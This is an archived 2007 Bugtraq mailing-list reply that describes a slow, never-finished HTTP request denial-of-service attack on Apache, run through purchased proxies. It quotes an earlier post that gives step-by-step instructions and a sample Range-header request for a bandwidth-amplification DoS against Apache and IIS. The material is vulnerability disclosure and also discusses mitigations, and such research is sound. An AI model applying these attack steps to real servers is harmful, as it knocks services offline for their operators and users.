[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <20070105084527.GA7692@fenrir.highloads.net>
Date: Fri, 5 Jan 2007 08:45:27 +0000
From: bugtraq <bugtraq@...urityfocus.lists.bitrouters.com>
To: bugtraq@...urityfocus.com
Subject: Re: a cheesy Apache / IIS DoS vuln (+a question)
to kill is enough not to finish the request and let it timeout on server side.
no ddos/dos protection layers can stand against this attack (as far as i know) and the scenario is simple
1. fingerprint the timeout on serverside
2. dig the sitemap from target
3. build a list of browsers to advertise to server during request
4. buy proxies from black market
5. start requests thru proxies to target
requests are never to be finished. randomized headers, following the sitemap. send few bytes, wait smthin less than server timeout and send the next few bytes, never finish the request. at least apache will wait for the request to finish. with 2k proxies starting 3-4 requests (browsers sending parallel requests, target should allow more than one request) u can generate a contigous flow of 6k to 8k requests to apache. starvation will start sooner apache will just consume its resources waiting for bogus requests to finish, he will never read a full request but will just timeout waiting for data. the thing is you can make the wait process longer, because (at least in some implementation, i think i tested 1.3.x and 2.0.x), you send first few bytes then put apache in wait he will start his timer but when u send the next few bytes after X seconds he will reset his timer for that request. slow , sure-thing death.
with a default timeout of 300 seconds on server side and request headers having lets say 512 bytes of data, sending max rand(5,10) bytes before timeout comes in u will keep a thread busy for at least 300*50 seconds with one single request ... discard connection when requewst is sent and just start a new one, u dont have to consume bw by reading response
a quick fix for this can be available at least on bsd, there is accf_http that can be modified not to pass the connection to apache until a full request is read (either get or post, full, not just the first get request header, ofcourse this can be even worst for a lot of post data). prolly there are ddos middle layers that can do the thing but i did not found one yet. at least the big guys on the market seem to be vulnerable.
you can't find patterns to stop this kind of attack cuz you simulate a real browser 100%, all u can do is to readahead the request and filter bogus before apache does. 99% from apache setups coming with default config, never modified by owner. thinking cpanel, at least. its not about consuming srv bw, its just about making it choke and its happening very fast.
On Thu, Jan 04, 2007 at 12:27:11AM +0100, Michal Zalewski wrote:
> I feel silly for reporting this, but I couldn't help but notice that
> Apache and IIS both have a bizarro implementation of HTTP/1.1 "Range"
> header functionality (as defined by RFC 2616). Their implementations allow
> the same fragment of a file to be requested an arbitrary number of times,
> and each redundant part to be received separately in a separate
> multipart/byteranges envelope.
>
> Combined with the functionality of window scaling (as per RFC 1323), it is
> my impression that a lone, short request can be used to trick the server
> into firing gigabytes of bogus data into the void, regardless of the
> server file size, connection count, or keep-alive request number limits
> implemented by the administrator. Whoops?
>
> Since there are easier tools to (D)DoS a service, and since nothing about
> this attack is particularly innovative, I'll just describe what's on my
> mind... let's say that http://example.com/foo.html is a medium-size static
> file we found on the server (something on the order of 300 kB for Apache
> and 150 kB for IIS is optimal). An attack would then look roughly the
> following way:
>
> 1) Connect to the server (as many times as allowed by the remote party
> or deemed appropriate for the purpose of this demonstration),
>
> 2) Negotiate a high TCP window size for each of the connections (1 GB
> should be doable),
>
> 3) Send a partial request as follows for each of the connections:
> GET /foo.html HTTP/1.1
> Host: example.com
> Range: bytes=0-,0-,0-,0-,0-... (up to 8 kB for Apache, 16 kB for IIS)
>
> Each "0-" would generate a separate multipart/byteranges containing
> the entire file (bytes from 0 'til EOF).
>
> 4) Send a closing newline within each of the connections to commit
> the request,
>
> 5) Silently drop the connections, possibly re-connect to dial-up / DSL
> to duck the responses that would keep pouring at full speed until
> TCP window size is exhausted or an ISP-level non-delivery /
> congestion control mechanism kicks in (and isn't filtered out
> down the route).
>
> This should cause the server to send gigabytes of data, with only a
> minimal bandwidth expense on the attacker's end.
>
> Well, that's the story.
>
> This isn't the only "fire-and-run-away" attack that seems to be made much
> more feasible with the help of window scaling (by making it more tempting
> for the attacker to request tons of data and then go off-line and never
> acknowledge it). Was there any work done on that topic? Can't Google
> anything up.
>
> (An example would be an "old-fashioned" attack on a server that happens
> to host multi-gigabyte ISO files or movies - simply request them
> many times and let window scaling do the rest... of course, most
> high-profile sites are smart enough to host static HTML and basic layout
> elements separately from such bandwidth-intensive and non-essential
> content, so it still makes sense to take note of "Range" behavior).
>
> /mz
--
adrian ilarion ciobanu (cia)
Powered by blists - more mailing lists